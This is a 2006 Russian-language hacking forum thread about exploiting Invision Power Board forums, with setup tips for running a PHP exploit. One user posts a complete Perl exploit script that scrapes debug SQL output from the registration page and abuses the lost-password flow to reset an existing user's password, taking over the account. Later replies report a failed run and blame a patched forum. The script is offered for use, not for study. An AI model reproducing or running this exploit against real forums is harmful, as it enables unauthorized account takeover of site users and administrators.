 |
|
04.11.2006, 18:49
|
|
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
С нами:
10729766
Репутация:
268
|
|
думаю сцена переживает некий переломный момент, либо в скором времени появиться команда которая с новой силой будет находить баги и выпускать интересные релизы, либо хак уйдет в полный андеграунд. ИМХО сейчас хак является попсовой вещью.
Интересно посмотреть, что будет через год или более.
|
|
|
04.11.2006, 21:07
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
С нами:
10686686
Репутация:
447
|
|
Сообщение от Elekt
Вовремя рст ушли со сцены.
Все возможные и невозможные критические баги в phpbb и ipb видимо уже найдены.
Я не удивлюсь если скоро появится новый двиг форума и новая команда которая будет выкладывать баги к нему 
|
|
|
|
04.11.2006, 21:59
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2005
Сообщений: 1,662
С нами:
10897046
Репутация:
1329
|
|
HELP:
Код:
Это описание для тех, кто не знает, как сделать так чтобы заработал php_curl:
1. Качаем http://limpompo.jino-net.ru/php_curl.rar
2. Копируем libeay32.dll и ssleay32.dll в диру c:\windows\system32\
3. Копируем php_curl.dll в диру [you_apache_dir]\php\extensions
4. Редактируем PHP.ini - Удаляем Комент с extension=php_curl.dll
5. Перезагрузи Апачу!
6. Уря =) Работает... ыыыыыы
С Уважением limpompo.
Последний раз редактировалось limpompo; 04.11.2006 в 22:16..
|
|
|
|
05.11.2006, 22:05
|
|
Новичок
Регистрация: 26.09.2006
Сообщений: 9
С нами:
10327824
Репутация:
1
|
|
Плиз помогите ЛАМУ как вообще пользоватся Php скриптами? Дайте хоть ссылку на видео плиз или опишите как их использовать.
З.Ы. буду очень признателен
|
|
|
|
05.11.2006, 22:29
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
С нами:
10358246
Репутация:
378
|
|
Вот прочитай:
http://forum.antichat.ru/thread26510.html
сплоиту нужен php_curl.dll, как его прикрутить к php смотри выше...
|
|
|
|
06.11.2006, 21:07
|
|
Новичок
Регистрация: 26.09.2006
Сообщений: 9
С нами:
10327824
Репутация:
1
|
|
ок спс большое
|
|
|
|
07.11.2006, 09:29
|
|
Новичок
Регистрация: 06.11.2006
Сообщений: 1
С нами:
10269161
Репутация:
0
|
|
А почему когда запускаешь сплойт появляется пустое окно?
|
|
|
|
08.11.2006, 05:47
|
|
Постоянный
Регистрация: 06.06.2006
Сообщений: 515
С нами:
10489346
Репутация:
963
|
|
Вот если бы сплоит вышел на Perl было бы другое дело))
Выложите плиз на PERL этот сплоит!
На всяк пожарный выложу: (тока я его не тестил!!!)
Код:
#!perl -w
use strict;
use LWP::UserAgent;
my $target="http://127.0.0.1/board/index.php"; # victim
my $name="hax0r"; # existing user
my $pass="31337"; # password to set
my $proxy=""; # optional: http proxy
my($prefix,$suffix,$regid,$regcode);
my $ua=LWP::UserAgent->new();
$ua->proxy("http",$proxy) if($proxy);
my $response=$ua->get($target."?act=Reg&CODE=10");
if($response->is_success)
{
if($response->content=~/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>(.+?)_reg_antispam<\/span> \(regid,regcode,ip_address,ctime\) VALUES\(\'(.{32}?)\',(.+?),/im)
{
$prefix=$1;
$regid=$2;
$regcode=$3;
}
else
{
$suffix="&debug=1";
$response=$ua->get($target."?act=Reg&CODE=10".$suffix);
if($response->is_success)
{
if($response->content=~/INSERT INTO (.+?)_reg_antispam \(regid,regcode,ip_address,ctime\) VALUES\(\'(.{32})\',(.+?),/im)
{
$prefix=$1;
$regid=$2;
$regcode=$3;
}
else { exit print "\nExploit failed!\n" }
}
else { exit print "\nExploit failed!\n" }
}
}
else { exit print "\nExploit failed!\n" }
$target=$target.$suffix if($suffix);
$response=$ua->post($target,[act=>"Reg",
CODE=>11,
member_name=>$name,
regid=>$regid,
reg_code=>$regcode]);
if($response->is_success)
{
if($response->content=~/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\) VALUES\(\'(.{32})\',(.{1,32}),/im)
{ changePass($regcode,$regid,$1,$2) }
elsif($response->content=~/INSERT INTO '.$prefix.'_validating \(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\) VALUES\(\'(.{32})\',(.{1,32}),/im)
{ changePass($regcode,$regid,$1,$2) }
else { exit print "\nExploit failed!\n" }
}
else { print "\nExploit failed!\n" }
sub changePass
{
my($regcode,$regid,$vid,$userid)=@_;
my $ua=LWP::UserAgent->new();
$ua->proxy("http",$proxy) if($proxy);
my $response=$ua->post($target,[act=>"Reg",
CODE=>03,
type=>"lostpass",
uid=>$userid,
aid=>$vid,
regid=>$regid,
reg_code=>$regcode,
pass1=>$pass,
pass2=>$pass]);
if($response->is_success) { exit print "\nExploited!\n" }
else { exit print "\nExploit failed!\n" }
}
|
|
|
|
20.11.2006, 05:47
|
|
Новичок
Регистрация: 25.04.2006
Сообщений: 11
С нами:
10550389
Репутация:
3
|
|
C:\Documents and Settings\Bart>C:\Downloads\ipb217.pl
Exploit failed!
|
|
|
|
20.11.2006, 08:42
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
С нами:
10721066
Репутация:
4360
|
|
Ну failed - значит, failed, значит, форум патченный. Чеж ты хочешь то тогда  |
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
О законе.
|
_-[A.M.D]HiM@S-_ |
Статьи |
38 |
05.11.2015 23:18 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для F.A.Q [R3x]](/avatars/avatar27667.jpg?217905){kind=avatar}
![Аватар для F.A.Q [R3x]](/avatars/avatar27667.jpg?218464){kind=avatar}
Линейный вид
